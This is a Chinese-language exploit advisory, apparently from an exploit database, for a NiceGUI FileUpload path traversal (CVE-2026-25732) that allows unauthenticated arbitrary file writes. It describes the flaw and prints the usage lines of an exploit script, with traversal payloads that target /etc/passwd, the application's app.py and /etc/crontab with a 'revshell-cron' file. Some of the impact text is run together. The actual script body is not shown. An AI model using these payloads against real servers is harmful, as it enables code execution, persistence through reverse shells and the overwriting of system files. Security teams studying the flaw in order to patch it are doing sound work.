作者: Mohammed Idrees Banyamer
联系方式:
漏洞利用标题: NiceGUI FileUpload 路径遍历导致任意文件写入
日期: 2025-06-06
测试环境: NiceGUI ≤ 3.6.1(Linux / Windows 上的 Python 3.8 – 3.12)
修复版本: NiceGUI 3.7.0
CVE: CVE-2026-25732
弱点类型: CWE-22 — 对受限目录路径名的限制不当
攻击向量: 网络
所需权限: 无
用户交互: 无
平台: Web 应用程序(NiceGUI / Python)
当应用程序开发人员在保存路径中使用原始文件名且未进行额外清理时,NiceGUI ≤ 3.6.1 版本未能在 ui.upload() / FileUpload 处理器中正确清理上传文件的 name 字段。
这允许未经身份验证的攻击者通过路径遍历序列(../、绝对路径等)在 NiceGUI 进程具有写入权限的任何位置写入任意文件。
常见影响示例:
app.py / → 在应用程序重新加载/重启时执行代码main.py/etc/、主目录、.ssh/、配置文件夹等#!/usr/bin/env python3
"""
CVE-2026-25732 — NiceGUI 任意文件写入(路径遍历)
当应用程序在保存路径中使用未清理的 FileUpload.name 时进行利用。
用法:
python exploit_cve_2026_25732.py http://target:8080 "../etc/passwd" payload.txt
python exploit_cve_2026_25732.py http://target:8080 "../app.py" malicious_app.py
python exploit_cve_2026_25732.py http://target:8080 "nicegui/../../../etc/crontab" revshell-cron
"""